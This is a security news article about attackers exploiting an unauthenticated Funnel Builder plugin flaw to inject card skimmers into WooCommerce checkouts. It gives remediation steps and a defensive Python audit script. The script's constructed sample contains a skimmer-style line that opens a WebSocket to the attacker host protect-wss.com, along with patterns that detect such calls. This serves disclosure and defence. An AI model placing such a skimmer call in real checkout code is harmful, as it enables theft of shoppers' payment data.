PROBABLYPWNED
Malware | May 17, 2026 | 3 min read

WooCommerce Stores Under Attack via Funnel Builder Flaw

Attackers exploit unauthenticated vulnerability in Funnel Builder plugin to inject payment skimmers on 40,000+ WordPress stores. Patch to 3.15.0.3 immediately.

James Rivera

A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject credit card skimmers on WooCommerce checkout pages. Security researchers at Sansec published details of the campaign this week after observing attackers targeting more than 40,000 online stores running the vulnerable plugin.

The flaw allows unauthenticated attackers to write arbitrary JavaScript directly into the plugin's global settings. That injected code then executes on every checkout page, silently capturing payment details and exfiltrating them to attacker-controlled infrastructure.

How Attackers Are Exploiting the Flaw

The vulnerability exists in a publicly exposed checkout endpoint that lacks proper permission validation. Attackers can issue unauthenticated HTTP requests that reach an internal method capable of modifying the plugin's configuration without any authorization checks.

Once inside, the attack chain works like this:

  1. Initial access: Attacker sends crafted request to vulnerable endpoint
  2. Configuration injection: Malicious JavaScript written to the plugin's "External Scripts" setting
  3. Persistent skimming: Code executes on every Funnel Builder checkout page automatically
  4. Data exfiltration: Skimmer opens WebSocket connection to wss://protect-wss[.]com/ws to retrieve additional payloads and transmit stolen data

The attackers plant code disguised as legitimate Google Tag Manager scripts—a common technique for blending malicious activity with expected analytics traffic. The final payload harvests credit card numbers, CVVs, billing addresses, and any other information entered at checkout.

Which Stores Are Affected

Funnel Builder is a popular sales funnel and landing page builder for WooCommerce, used by over 40,000 active installations. Any store running versions before 3.15.0.3 is vulnerable.

The attack is particularly insidious because it requires no user interaction beyond normal checkout behavior. Customers have no way to detect the skimmer—the malicious code runs invisibly alongside legitimate page functionality.

This campaign continues a broader trend of payment-focused WordPress attacks. Earlier this year, we covered similar exploitation patterns targeting WooCommerce stores, where attackers combined multiple access vectors to extract customer payment data at scale.

Immediate Actions for Store Owners

FunnelKit, the company behind Funnel Builder, has released version 3.15.0.3 to address the vulnerability. Store owners should:

  1. Update immediately to Funnel Builder 3.15.0.3 or later
  2. Audit your External Scripts setting: navigate to Settings > Checkout > External Scripts and remove any unfamiliar code
  3. Search for suspicious domains: look for references to protect-wss.com or other unfamiliar WebSocket endpoints
  4. Review transaction logs: check for unauthorized transactions or customer complaints about fraud
  5. Consider notifying affected customers if you find evidence of compromise
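
Steps 2 and 3 of that audit can be scripted. The following is an added example, not code from this article or from FunnelKit: it takes the text of the External Scripts setting (assumed to have been copied out of the admin page or the database by hand, since the plugin's option name is not stated here) and flags WebSocket endpoints, script hosts outside an allowlist, and "Google Tag Manager" blocks that reference non-Google hosts. The allowlist and both sample settings are constructed assumptions.

```python
import re

# Hosts a genuine Google Tag Manager container snippet loads from.
GTM_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}

# Assumed allowlist: hosts the store owner knowingly placed in External Scripts.
ALLOWED_HOSTS = GTM_HOSTS | {"www.google-analytics.com"}

URL_RE = re.compile(r"\b(wss?|https?)://([A-Za-z0-9.-]+)", re.IGNORECASE)
WS_CTOR_RE = re.compile(r"\bnew\s+WebSocket\s*\(", re.IGNORECASE)


def audit_external_scripts(setting_text, allowed_hosts=ALLOWED_HOSTS):
    """Scan the External Scripts setting text and return (severity, message) findings.

    An empty list means nothing stood out; it does not prove the store is clean.
    """
    findings = []
    lowered = setting_text.lower()
    # The skimmer in this campaign hides behind GTM-looking markup, so note the claim.
    claims_gtm = "google tag manager" in lowered or "gtm-" in lowered
    hosts = {(s.lower(), h.lower()) for s, h in URL_RE.findall(setting_text)}
    for scheme, host in sorted(hosts):
        if host in allowed_hosts:
            continue
        if scheme in ("ws", "wss"):
            findings.append(("HIGH", f"WebSocket endpoint {scheme}://{host}"))
        else:
            findings.append(("MEDIUM", f"script host {host} is not allowlisted"))
        if claims_gtm and host not in GTM_HOSTS:
            findings.append(("HIGH", f"'Google Tag Manager' block references {host}"))
    if WS_CTOR_RE.search(setting_text):
        findings.append(("HIGH", "inline 'new WebSocket(' in checkout scripts"))
    return findings


# Constructed sample: a genuine-looking GTM snippet followed by an injected block
# that imitates it but opens a WebSocket to the domain named in the Sansec report.
INJECTED_SETTING = """
<!-- Google Tag Manager -->
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>
<!-- Google Tag Manager (loader) -->
<script>new WebSocket('wss://protect-wss.com/ws');</script>
"""

# Constructed sample containing only the genuine snippet.
CLEAN_SETTING = INJECTED_SETTING.split("<!-- Google Tag Manager (loader) -->")[0]

if __name__ == "__main__":
    for severity, message in audit_external_scripts(INJECTED_SETTING):
        print(severity, message)
```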

For guidance on recognizing suspicious scripts, see our phishing email examples guide which covers common attacker techniques for disguising malicious payloads.

The Magecart Problem Won't Go Away

Payment skimming attacks—often grouped under the "Magecart" umbrella—remain one of the most persistent threats to e-commerce. Unlike ransomware that announces its presence, skimmers operate silently, sometimes for months before detection.

The attack model works because:

  • E-commerce platforms run complex plugin ecosystems with varying security quality
  • Store owners often lack security expertise to audit their installations
  • Payment data offers immediate monetization through fraud or resale
  • Attribution is difficult when attacks route through multiple compromised hosts

Organizations managing WooCommerce deployments should implement regular security audits, monitor for unauthorized configuration changes, and consider web application firewalls capable of detecting injection attempts. The OWASP guide to Magecart attacks provides additional hardening recommendations.

Supply chain attacks targeting developer tools show similar patterns—the recent node-ipc compromise demonstrated how attackers increasingly target the software distribution channels themselves rather than individual deployments.
